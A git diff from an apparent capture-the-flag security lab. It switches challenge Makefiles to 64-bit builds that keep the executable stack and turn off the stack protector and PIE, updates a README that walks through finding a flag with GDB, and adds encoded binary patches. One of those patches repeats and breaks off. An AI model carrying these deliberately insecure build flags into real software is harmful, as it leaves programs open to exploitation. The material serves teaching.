0cbf47ab9..204e661f3 100644 --- a/labs/lab-12/tasks/look-at-him-go/solution/Makefile +++ b/labs/lab-12/tasks/look-at-him-go/solution/Makefile @@ -1,6 +1,6 @@ CC = gcc -CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector -LDFLAGS = -no-pie -m32 +CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector +LDFLAGS = -no-pie -m64 SRC_DIR = . TARGET = dynamic OBJ = dynamic.o @@ -8,10 +8,10 @@ OBJ = dynamic.o all: $(TARGET) obfuscator: $(SRC_DIR)/obfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall deobfuscator: $(SRC_DIR)/deobfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall $(TARGET): $(OBJ) $(CC) $(LDFLAGS) $(OBJ) -o $(TARGET) diff --git a/labs/lab-12/tasks/look-at-him-go/solution/README.md b/labs/lab-12/tasks/look-at-him-go/solution/README.md index 2fedd6691..802296b30 100644 --- a/labs/lab-12/tasks/look-at-him-go/solution/README.md +++ b/labs/lab-12/tasks/look-at-him-go/solution/README.md @@ -8,17 +8,15 @@ parent: 'Task: Hook at Him Go' Run the executable with GDB, ideally with `gef`, `pwndbg`, or `peda`. As you step through, you will notice that the flag will appear in fragments in the display of the register contents (the flag string contains null characters placed specifically so that it would not be displayed all at once). -```asm -$eax : 0x0804d625 → "_out," -$ebx : 0x0804d22e → "_out," -$ecx : 0x0804d62a → 0x00000000 -$edx : 0x0804d625 → "_out," -``` +You may also see fragments in the memory dump, at times. -You may also see fragments in the memory dump, at times: +To step through the code, you can use the following commands: -```asm -0xffffd4b8│+0x0008: 0xf7fb9000 → 0x001ead6c -0xffffd4bc│+0x000c: 0x0804d600 → 0x00000000 -0xffffd4c0│+0x0010: 0x0804d210 → 0x00495348 ("HSI"?) +```gdb +ni # Step to the next instruction +n # Step to the next line of code +b *0x
or or # Set a breakpoint at a specific address +c # Continue execution until the next breakpoint ``` + +Observe the registers and memory as you step through the code, and you will see the flag being constructed in parts. diff --git a/labs/lab-12/tasks/look-at-him-go/support/dynamic b/labs/lab-12/tasks/look-at-him-go/support/dynamic index f36e23a0c2450c44843fd42dfe9664949dbbf82a..cf6827ad252f0ba0bea3b1a8c4787ed851609772 100755 GIT binary patch literal 18672 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 literal 19664 zcmeHP4RBP)ecyNYo^*#!r_b;m`)msvY;=+^25kHxfleS0AU=%)_;I=q-I>$f|$qI6j$M5Uao6 zzI)QsAyT(9O~;K^+S~o_|F{3${qM)y-M9Om40LrUiXtrI5KcjA=!oiC40rn~le1X( zgj>uPw}_iX8G^`Ld=MB|A0p7I2%~kvZUMdJkm{nX15HaFf~AEc1me;js1SlyV_3Dx zSF3>k3)Mxt5RsZ;nJ)PbI3Dml;L#R9(~@uHAqIR5Y16hNoYvxXziou;rwLL2tm>jI z3uF)sP5)^EkHsVA0& zhH>j*sXOxb|L%o9*}CBB7r*)Bm;P;A>?g0pTe@b*a)VD9Qdd6VgI9Q9zq-nl`~8sT_S&t)TFku@^OP

eXW~gCDnh|TA{7#Sk-lui5Sd^ytY<`@ z8K~=&g2=&)q4x#jNfFINB4Sln=Zcm3B7ZYPZ&{~@Bbi8VJZnTUTh^^iq>_;>!Jb4! z=z4EoDp`!Io6t#t$gzTU$v?|AeXJ`*{+VqDq^OR^E7^*7l7P8{He3eaWxA-?t8~#m zJuj%Pa#VUXT{Mh(x=_wcx@e4Z>6Q!Oqw5l)fv#JK`E;SocdKr=vN?ajRrn1OIW#+&f0jRY zv3tv=!YyDN8s0fah{1gN{OD-+V7{8p#%-sMAOEE4>MlHrSeFLoHVj9HqC-QBFMXsy zTMUzo4i(;@z>^ge_$+fVc$mL;zhZoJ;P54gf^O=z_P?FKP`{BXs{ZcqpmD1h8XkP{ zR^UY8dHftY`6}8vP@C;C@)y(vubjB-=pR1u&W*~OKe%kv4}AJ6MZRuKLp5}79DN-E z2X|eowG;Lt4;?lfk5Cz)44zg*?L5Y70|c}nfFIWk-h%F8C&2k zEAY+py=bBN3!cHi8{LH^#o!Zv-y4la`(OFZFMjY|KgxdNf|LCt{ei;3)P#EkU?cZ8>>Ui$#z}5=`fwRg;)!&MILFqp+u=U&k zFpvkaCknHallixvl;U4)8McId%@o!@3F^c^;L>2X(!cdm|H*;C8D*s9)&75arkd&I z0~eKnb(bd1`^gh;Igscp3r5fos%)7$ay%Cs*m`LoaB%_U4bF9#RR50_oVt#%!TPd+ zz?;elD)bR;b9dn)8Uq^uGj>JhNpc<$-G!G;RBwO{=)716_&uH#Uq0bWW=3wOV zj)&14x*Ak;mC=u1Mdfcibm54sVp-FO@<_O_){KEV7z`XdEjFioq0_BuB9)CqPq(^! z0+n!DV8rwxbbrKvzaMV3f7+?mT5&4SPi+2p-6=GdPebwjfpf+DzSA_Y z_2NL_oUFYg$Bj7_2^Hl}PD7PG)Bcfz`M@RR9c75x&p&?A^TexTEmAhccb3Xxj|sU2 z)j!x>DaA@T_5D9UyHdVKagH%zsLsbP-1r2VggTmI8M|X%JktwzUNPGl^;Rg{Wuwj& zZZoOBV-FZuclEo2!K=kF!|aa_ZrfZK2IkQ4&!@{qKagmcU-;^Kqoaf0aG|da=2iSI zICbKEhjB~GC zJjQf59-}A9CkV3^U7p^%cY4#>WxLn5Z2H(^OMRJ!n>rtM1=_Uft#>^>Z>1~Um)my3 zv>GK?99>t@~7 zQ00!y+^}cu!p=DnWA@A)GuA&ied&Xl%`IJGUUps<>CbU4Z$sz=|vdFEgBzeJM3RHD z_VP*-zZ#I2U@xM4yWoldWw&`fpLDi)tDjcey!Cl)z1J7?PV_#XZfm;rV1Td<)g?cGo^tk4gBA0;P_Lj>mV$L1zHd6nY`-4 zBwg&o%xM-}u0t_rlg24ab0w zz|wGx7nt>OJ=Y4$v9bns2JBI!OaBqLToZ9(&9$=&7Q;s>jBpIGDdzJc+|{7r{T~~y zpRLH#vF5)Ob_r|;>^9ga>|WTXVToI{a^*d~`Br1jCqts=Hd2L8y*z5Yp5L7qb;1(#Z{?k zB=!z0D?@wqP$HO(ne`-@rkqezPiIm_BxJ->Nh*Qu$;R*4uxU$Y$3tS2VR-(V#*{0U zr`xydZJRd-fZDKrGq@%B;gV2{Jx^r3o205sWTpDzh91qJQS0tt=^;?M@nd z*)ow}BHo*1`1R_NdquRR^)pqMZ1ZNfF1e3ZvPboS_DC4<54qoUojIS( zKkKs(_Jhp%EbQ--M_FtiA4Hyoyawjt`$NC; z_+x(tO!dqEKmBsDc^jX(wEtZm=ZNAub4bn+hhX`BSPok9EwK>)h`H*$^5rj|NAt)EbP!Ex}+uhYNqNjfg=E7B=%g(EZS{LHLBW00zSok0f?==|&)90?L- zYPn3$^>s*mUTtwL2haU|aMU}?DOtFwLUoDzYjoTv_`6gRF88y*s>>wdasMlcyCqTW zZih7W9!b=@KTBe{Bxbttj##MoN@A}2ha~QkgwLHMtW^>X?(a}qn7KAms`RZNmsQ(y<#qMvBSS@qC%zc=!PD$MB#t9&yuBjLVpw;~|!q(NUh12d< zDSCa?Lm)cbe6y`?aP3CeD)#}#*;thZvDz(<`8-tl0svj^-x0QB#$(`YasNAEJ7+x& zV!Qhd{HnWTc6PcKk@K+o7|^@jUm!=HHV;JD{VX}VW!_@$W90O>J_RQs94~^UmCt$+ zxM^P?><(|mO>oQA4FHs@WO&#>n6FAU9)_+0QSqMi?xpvFjByBFi9KpzZxh~yV3qZI zzl@-Am6h!sV#u>H#QRMIlnt2vO%yWQ!$#mKApD-`pCb7qrU z%>ZSw#wa|*%L7@;(L?AOH9QBcEGehonLGGo%`Jc^OI>VKj$Ewv5uq$AlMOj%)XXJz zMUfY-yZ;&0#Ut!-#I21BrMhlZ4}VZfDH{4E0n|r;g{k%v@BNxp;0nQni(St;}JT&(5{ zW6mma!!@r_3$u&l?%GTwi=%f%L0f90II6D9Et1_p)+qD5brnwU9B++MTUL$JB97_8 z>Ak07dBxooopn%HgQ%#u9|)-YR>2Uh7=o@@Rs|+%fDT!%I>qU&s4!zI2yj>0ge?Pf z+PHKyl{#?m#Yq^CqIA{~UwIRfXadf=*cS1DSp-$x1m#rwl?P^7`MYgaXC1TMI`cCt zW-)q=J(dHEvI@h1x(XDzwv6C<(~BcC*OiF`c~;&bM&MJFE8a@{%8M;jdQ&c& zk=HV?=i0Py*%E!p;>JuQ919xeEsdsSP4Q$XkqbwJgcgaWp16^{Hl)eepGIZbk?5}b zakwNN@`sQ7Mf2pfs+{KfgjVKs8(O8ImF2YQdtGZam#a&wd`PQs)oO0X{5nl- zdRwbmt+|J^y7k(eV_M60?ViJ$5A60e+9o({ur9w=c1&yAu6fpI&Zf1RyGtu`++3^8 z77kTeqt((mrrohttN)R9!{@cxuBfKotJS&g*VJR0>s_tVnK3liG0owuIjp(g)Rg;> zG1mjyw7r_+k_)+U%&*tV*J_@qR&~EtaYS<%nx~0r&gjxShqW0|t>#`$T^rWsASuTU zICvuyRuftUMA*Sd5BTj8-&BI{bH#ovlYhwJLdENPDjL-dd2a-7SHpVR$Ot_YmMMB|A_GBuv@NHQ$+Xd>8~9m}B%3gt3-2r~LmAbGb11?KG+-joTY!jaHk zvxqH1PbI=s2f4iw90h_f3F`}H_TVs(yjO!Xa4iNykWO7>Be-NkNuS8X4ICSS^4KVo zXq7@L%r{Xjyqy!=8!>gK<1WsgVxFPkK4gYzq;h8FOp&q-h(>I&p4b=cZ68r(2D4%; zF;rki#AN}@Y)F+cpYd=+4+o8)tsCll4PN50ijFgDzLhOYOHP$da%|1l*mvh5{1~}p zM?jn3x_ME6b%#ef9=3J;7dFMzU&%0|Tx%p(&47k(ADn zXA;9Zcnmgg_L=wMOd3NH%rj$rj7Ts%%ShK*oSpJ4qe+{)Z#?5@(&mXY>kOh(o*2hS zSUi*HG=GAnZ@+78t7ty4-gJzz|G-*8PU^v${ zX>+%dclu14r!Fzy8l%k3Or*1Tik=--ymA4M0i0&N-U z`x~IS-z&qwKMk7eON;&~XnT6UDWU7o1?~Li5_)3^-B&^nme5};p?Sf?p1-$1b3fV2 z-)ISa1Lh<4{4X~btP;-hc7VQE)Q1BnTvvl`#zchx(mO!&Y_&yyoP4x@R0G=TOkDpR z?|%wTI)4c?&tqHoZ-BP?t0HQ}>!2+o+jj|l2K2rGGrl5ERaB%;{#;RBjiX9v7~<`Ba_h|@pUI)TLbQNpd)g)GO3_xr=i<;B@2XMX zo55#)VzSKNo)Y|9V6gr3ZV=1=1o%UcPyO*u@KYuD&w?J;$4v28psgh(vXgLKa z3G>HN#$>q3!u`2qBEBb**gt86>oNUuvY1Ox8tFPbe`H^L@@!3HAi5C`VYY)woxQvh z!zY$|B5z_jC-NBY_wgsu$0P!-)yqWCwfdRJm$^Vt#<1&fBBn%N6PZ%LM7`mz55}ovBoS?t%`CNfJOTo*X?x>g6YF6-e4>uW!>`rNP0mj9~O#GU< z8ILR3jEi9ai^6CWU19w50=m(M>mvBT0G4xlIHmU{Qa!u>OeVM=#WXVe@l69>?+EAm`t~D=jglpu03F|_(DjZ@ZR-MhV12ue zj~h&cV*S_t(E7G@ohv7DOr_~MmQ#9Qby33V_Dw=x)wN+oTbI6}qhoVmi@v38MOT1Q z<>wbHyb&96HkqZ2>%pog<5J%)?X{0szEWO9{ketqJaPfAP_I#ytI$l^ySCLkv7 z?pXfGk6KKCM$>xi6U8rDOkn6e*=#ZA=1Ned;3OojQO47(uV&+hNTIvK8! zG2NKu!{R!U!IL71OHBT@6`hR+HV#axH<|PI;%5g;m31=c+-4oLe2Q((cA)C4ojT;t_>JI_$|Zv5e;{x zEgaYNymQ?kIp&XrYX|vj+#jSouJ?}>a{5^Ep@x$NBs|WY)fWU`6?S5y$d!UOWUG z%Vrr1_eBIy9&z$JN7!m13_cBAHh!@6UX%zzvomahQX0I*4s~EnH}P|4|54P-p{p+mF_tN zSU9;pgJKt2Ah;GzzRLkkd0YoA1kRp6tLX27&-97o`l9(dxXa)(PBSbGagC-|{*osx ze%LQ*xE|UK+*Q8XEgCBiGk_!BGCLv6XAy8M-mN9L1Hkz$AvPReE?RLY=5H`S+-wW5 zysag;*A}7Qv+)#-h3hKftn&UCXP19nf+LpJ7A!`V3egP(+=OtxgJxEt0@)|2W6SvP Z!tg8`M$u3X4R`MBIMD$)785+n`=6h}SpNV3 diff --git a/labs/lab-12/tasks/playing-god/solution/Makefile b/labs/lab-12/tasks/playing-god/solution/Makefile index 2d39ad34a..732cf6854 100644 --- a/labs/lab-12/tasks/playing-god/solution/Makefile +++ b/labs/lab-12/tasks/playing-god/solution/Makefile @@ -1,6 +1,6 @@ CC = gcc -CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector -LDFLAGS = -no-pie -m32 +CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector +LDFLAGS = -no-pie -m64 SRC_DIR = . TARGET = dynamic2 OBJ = vuln.o @@ -8,10 +8,10 @@ OBJ = vuln.o all: $(TARGET) obfuscator: $(SRC_DIR)/obfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall deobfuscator: $(SRC_DIR)/deobfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall $(TARGET): $(OBJ) $(CC) $(LDFLAGS) $(OBJ) -o $(TARGET) diff --git a/labs/lab-12/tasks/playing-god/solution/dynamic2 b/labs/lab-12/tasks/playing-god/solution/dynamic2 new file mode 100644 index 0000000000000000000000000000000000000000..c53f08112bcd1ca0f5fe0f5ac4ee487afc173065 GIT binary patch literal 18064 zcmeHPZ)_aLb)Vhil1ClMJBqgcy5_o;Y|9GobTlPVk|ixgo^+IDiI&OO3Tm&GcYA-J zyS?k~o+P?z>_kyomR2hPiHj62kfK5B4=$j#j%&nDB|@%c*=|AkLu(Xmp*k``#ZIcI zZo#^aukX#yI~})VljcJap!bN~H}B2+y_tDCyR$R5!>1GbcFU5)h-9{dp>!^yag}#w zY-BqZg|45qGmWifYgjXAn&8lQ4stI={5{#rARZKU0pN&RfeFsFdHfD8F-Dwfh#YaZ zNE1nqzo~d4aTf7p#PKX4GtoZcheSPy*W-A3s^^EPnwJo~EGkC49*41sL_PD!4i87X zU&KWdoNy>2P8B#+;E2zN@`zJBv5t83i+1z}G>}mC_y#U9M%<6f30zLt6CV;d;#daK zqaV2GpQpSLfh(xo4J(K^5`WNBGvZXOc>kuJO?^?P6z%0zzb07ZWH-vfBK5` z`iat!zj$lsw_g6I&vifkXPUJdZLr>mK^r9WM_mME%%cP4pOx@>FI~WR)gpTAehb+j z2E7W0pRi5~*>^9ZXGNn>D5aRLL!eW-;~KWB7md8d$`#iEb>1nZwrtUzlwoCejC1|W6;exD%U2wLhV%k%km zyn}WMU1e3i6{9~ah$7~#_=2K^#7atfrA^TMg$rWXhfh9fkp%x5oko95rO~r5%|~eou4F6eiTej zDc56+B~M*&8y^?$Bbt7o{3FTgjiU#ZFX zf_wA&bWO$=+nd+_lw|Ps``p_QaMHZ!gtY_4d_Z`Ee#1?*0lC>iNHTOFZ*R5?-K_+wtsny@D3l8Y`+pqFO8G5v#;(#*-LPlKno;}^-%DsWVvH9eL1==6v*Irfp~Y6e`z-=6&Y-;8+0 z%`f3A7s97{Az}c!W&Q@VZYnW@t$Xn&&`MJ^@gc(6_<=FsXnu<~Ls z`R%#eFb30~wAX_0>D1V#`FFqhRf%B?K81>ZoSb~){F4x6etl<;0emX)@s`A=m6qAV z(4G&MoHrnMHVPTs#a1R4=&M4%CYMg$rWXhfh9fkp&= zF(M#|U!yYH%14hbi#^nT_@Vg0FYMf`u3vN4uoO%TD0gccOKS(0mx~8Jf9I0UZlfiA zZ{*2%Xs{)IVr)rabGgu39vgLgo>;Z}f%2O5ds~Xl%N{E~lz!ybmp{VRrrD@Hp&D8I zVUJ0x1Kawc+4#HFOaD@>o&er-qgwqI@FC!%z+K?DzHtAKtJT+l>o=>_tHANMQzYrB zgG@Rekyf|01kb>_1O9$@2OP8D?;bQ5YKfq3103j^emh%(S*QoQ5#X#Nvb$r&-f-wx z@ENvq)z+$%wCyn4I< zS;wI6Uj$yWkt;kORSjxHpb>#a1R4=&M4%CYMg$rWXhfh9fkp&=Q6g}rQ{z=REI57J zh~G*gwRsFCUK&rqN0XfPb!nWh^h8GAIj_ohfIc4(aA+zpBH|LwDC3FUJE z4Vm}NHt^$38j5`Ghc35zlXX1C7NXtFO za*D=Nr0*9p)f?xVNbu1pCn_I)EaX+26ZMCmGPz7~h3O=hXGOk%|DQ4XuH0YX2625g z!AAr?EV$o(&*0!z^}ez3ise?+cs$w{-Ov-Sa54VH-rnejzI8&)J_lGY>|XGm6J71k zDJDMOmqD*Ei5mxP$owTVz(6mAZ0&-KrYp<00+WI*J;0VUDS69f%>!Je;F5q86m z6vRabNp86V3Xz&xdQp;^KhKrQc2I_bO{YBN6Tq5zI@od_q}%qxN&dFfmH>{vUxFim zr*_u#EHI@5PV(2~Hq4xXgJ&}32qxc=xcd8;#uIDG!%5i#MF#GWJ8=CVfNA(n02V9m zhLd!kf{ySr2PD4209<;01nlJHaJoN?KIF4Gc^vq9-eCD`L5@M*`UryMvuPH_dr%5C zQ}p<92CANymw@4twj?(k;VwhmW#H^>83J{bxrz zG6)QQybp=)ChWi1nSKL~ufZWp-EvsL`$FQU@1pLn@bouu3Mdk5mFbGDQra#n;ffMG zrZi7hlx0Vi;Co8@Atm%3rBz5Ozc%!Zz@Wl^~*}@n~Jp!{Xm9yNc!HvzD1w z5s>E=zOVgj7O9+JGut!@x>YICCIHwOp$^73i>Ha&Q{2=CC%0mm+q0%++W8cShMmf7 z_x5b4Jz2FUW0iVFh6lX_Y&J+8=_%VK*G#!384)&W4vHG zkm;GH3Wk#-P`+eAMk-S$Gj9t+DU)$bmpP`HW=^hTyK1d9*xqc#bR3p7>~SM&3Io)O z-4M~((MrLJrdX_Kxv^Ai%rR{zma_AX8yhm6BW|f2%NVIj!8Ken=9op(acwg;d|+_j zKrB0^d%_Bf@C%M;+^;#VU>+%Uh{JC2e{F?7WC&Q>hq)RNvGm_QYhZN-Q3)89Ht{Uy9}+5NR;?5@|C7 ziT{D{mS|!>uKG>j{)Ahli9H+8c$Uh~-X4>M>~TzxS(x4MjZfV|uXbv}gU9eekM{JQ zLz(#Olh`VT-+Lip{gC)D!EUd;w|H8{ehm`nhu)h=kGHi1tI6~pMEXC1#6tC7x`_Ty zxSuXoxJ!f7d|JrQt6(CrWz0XWzs{jcYx}Lp)8BD>c+!dXlKzK~z&iP9Hv~jwD_OtK z9!HLa>{oMrxHeSNV6z7F5%5ECrgGM!y&PfmK1urcBL0VjAAfxw0liA#I(``Ro$^X( zu2!dItcZH}qy2qNBKHL77i!nDPugZyYQF>h2vJ>^T!lR zo3@#SXO3y>Zc$Icvl|9+T~C+vY@sv`kK;5vHXYrl9A~Lgv0N}+GacQqu!Wwk;g8+uH zKu;t^ZgS`#)A#HYkHU~xHf?vJPBmW1!yd?dTBrtg4a2~gW!yXmBO;5YCoCw!AyT5JpO(8ZMAsySskw1kRV?mW46JqZI*-CupBE&6hbt)A;>tz_U=vP;fu~G0^`z%!#S~v<`4i z;Hmx10`ITC0eV~mAUv%T%n1Ao0*7tHI1`@c>o|czQ^M1_!*NkjT4w+gPUxeaeia0q z;}f3d^|JzxQ$i%FKiLt-Sskt!kWA|aa{{j+7|36LPs`Y8NT4ab&`Jf!OJs=%ue&t#-# z=_Q1k+_OLS;mZPF7KYkS!JqTt&k6iFf&T^tR`{Xv$t`|)UtfQEkJ$&)R-|^1)z1F* zzXmyouN9+eo~`OJTsx>Iia+UIheSP|_SF|u&*DKc6x?6_yP&VfzaYwgLG=J{3LG(i z`TqbJ*vG}~R(t=Y{r7%*l8Mg(He83Nb;1=-=p&BJ(&KV!VESJ z2=5;x!qIj73Fy#-@U+kSMhva-oo_x7p12I)dVKA@dV`1SpAWB4=K zsn9CMESzJmPPpWHI0`bJn?RU_n9$AIQ07^9N9+~!T+HE z{gI`!@umhbD9pi3DFNK5p1C4*JprgJ6$r{aV@shJtkjU|gID=Xce|4J& KDER_kyomR2hPiHj62kfK5B4=$j#j%&nDB|@%c*=|AkLu(Xmp*k``#ZIcI zZo#^aukX#yI~})VljcJap!bN~H}B2+y_tDCyR$R5!>1GbcFU5)h-9{dp>!^yag}#w zY-BqZg|45qGmWifYgjXAn&8lQ4stI={5{#rARZKU0pN&RfeFsFdHfD8F-Dwfh#YaZ zNE1nqzo~d4aTf7p#PKX4GtoZcheSPy*W-A3s^^EPnwJo~EGkC49*41sL_PD!4i87X zU&KWdoNy>2P8B#+;E2zN@`zJBv5t83i+1z}G>}mC_y#U9M%<6f30zLt6CV;d;#daK zqaV2GpQpSLfh(xo4J(K^5`WNBGvZXOc>kuJO?^?P6z%0zzb07ZWH-vfBK5` z`iat!zj$lsw_g6I&vifkXPUJdZLr>mK^r9WM_mME%%cP4pOx@>FI~WR)gpTAehb+j z2E7W0pRi5~*>^9ZXGNn>D5aRLL!eW-;~KWB7md8d$`#iEb>1nZwrtUzlwoCejC1|W6;exD%U2wLhV%k%km zyn}WMU1e3i6{9~ah$7~#_=2K^#7atfrA^TMg$rWXhfh9fkp%x5oko95rO~r5%|~eou4F6eiTej zDc56+B~M*&8y^?$Bbt7o{3FTgjiU#ZFX 